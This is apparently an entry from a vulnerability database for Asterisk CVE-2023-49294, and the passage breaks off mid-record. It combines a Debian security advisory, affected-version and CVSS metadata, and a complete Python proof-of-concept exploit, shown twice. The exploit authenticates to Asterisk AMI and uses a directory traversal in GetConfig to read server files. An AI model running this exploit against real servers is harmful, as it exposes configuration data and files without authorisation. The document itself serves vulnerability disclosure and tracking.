Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
245 vulnerabilities by digium
VAR-202312-2340
Vulnerability from variot - Updated: 2024-03-30 22:40Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the live_dangerously is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-37457
The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49786
Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE----- . # Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)
Date: 2023-03-26
Exploit Author: Sean Pesce
Vendor Homepage: https://asterisk.org/
Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/
Version: 18.20.0
Tested on: Debian Linux
CVE: CVE-2023-49294
!/usr/bin/env python3
Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that
facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of
file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar
to the common INI configuration format.
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-49294
https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f
https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/
import argparse import getpass import socket import sys
CVE_ID = 'CVE-2023-49294'
DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB
def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding)
def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp
if name == 'main': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args()
# Validate command-line arguments
assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}'
args.host = socket.gethostbyname(args.host)
if args.password is None:
args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ')
print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr)
print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr)
# Connect to the Asterisk AMI server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((args.host, args.port))
# Read server banner
banner = sock.recv(DEFAULT_TCP_READ_SZ)
print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr)
# Authenticate to the Asterisk AMI server
login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password})
login_resp = tcp_send_rcv(sock, login_msg)
while b'Authentication' not in login_resp:
login_resp = tcp_send_rcv(sock, b'')
if b'Authentication accepted' not in login_resp:
print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr)
sys.exit(1)
#print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr)
print(f'[INFO] Login success', file=sys.stderr)
# Obtain file data via path traversal
traversal = '../../../../../../../../'
cfg_msg = ami_msg('GetConfig', {
'ActionID': args.action_id,
'Filename': f'{traversal}{args.file}',
#'Category': 'default',
#'Filter': 'name_regex=value_regex,',
})
resp = tcp_send_rcv(sock, cfg_msg)
while b'Response' not in resp:
resp = tcp_send_rcv(sock, b'')
print(f'', file=sys.stderr)
print(f'{resp.decode("utf8")}')
if b'Error' in resp:
sys.exit(1)
pass # Done
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.1"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "18.20.1",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "20.5.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-49294",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-49294",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-49294",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-49294",
"trust": 1.0,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n the available buffer space for storing the new value of a header. By doing\n so this can overwrite memory or cause a crash. This is not externally\n exploitable, unless dialplan is explicitly written to update a header based\n on data from an outside source. If the \u0027update\u0027 functionality is not used\n the vulnerability does not occur. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49786\n\n Asterisk is susceptible to a DoS due to a race condition in the hello\n handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n setup. This attack can be done continuously, thus denying new DTLS-SRTP\n encrypted calls during the attack. Abuse of this vulnerability may lead to\n a massive Denial of Service on vulnerable Asterisk servers for calls that\n rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n# https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n# https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n# https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576 # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n if \u0027ActionID\u0027 not in args:\n args[\u0027ActionID\u0027] = 0\n line_sep = \u0027\\r\\n\u0027\n data = f\u0027Action: {action}{line_sep}\u0027\n for a in args:\n data += f\u0027{a}: {args[a]}{line_sep}\u0027\n data += line_sep\n return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n sock.sendall(data)\n resp = b\u0027\u0027\n while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n resp += sock.recv(read_sz)\n return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n # Parse command-line arguments\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n argparser.print_help()\n sys.exit(0)\n args = argparser.parse_args()\n\n # Validate command-line arguments\n assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n args.host = socket.gethostbyname(args.host)\n if args.password is None:\n args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n print(f\u0027[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n # Connect to the Asterisk AMI server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.connect((args.host, args.port))\n\n # Read server banner\n banner = sock.recv(DEFAULT_TCP_READ_SZ)\n print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n # Authenticate to the Asterisk AMI server\n login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n login_resp = tcp_send_rcv(sock, login_msg)\n while b\u0027Authentication\u0027 not in login_resp:\n login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n if b\u0027Authentication accepted\u0027 not in login_resp:\n print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n sys.exit(1)\n #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n # Obtain file data via path traversal\n traversal = \u0027../../../../../../../../\u0027\n cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n \u0027ActionID\u0027: args.action_id,\n \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n #\u0027Category\u0027: \u0027default\u0027,\n #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n })\n resp = tcp_send_rcv(sock, cfg_msg)\n while b\u0027Response\u0027 not in resp:\n resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n print(f\u0027\u0027, file=sys.stderr)\n print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n if b\u0027Error\u0027 in resp:\n sys.exit(1)\n\n pass # Done\n \n\n",
"sources": [
{
"db": "NVD",
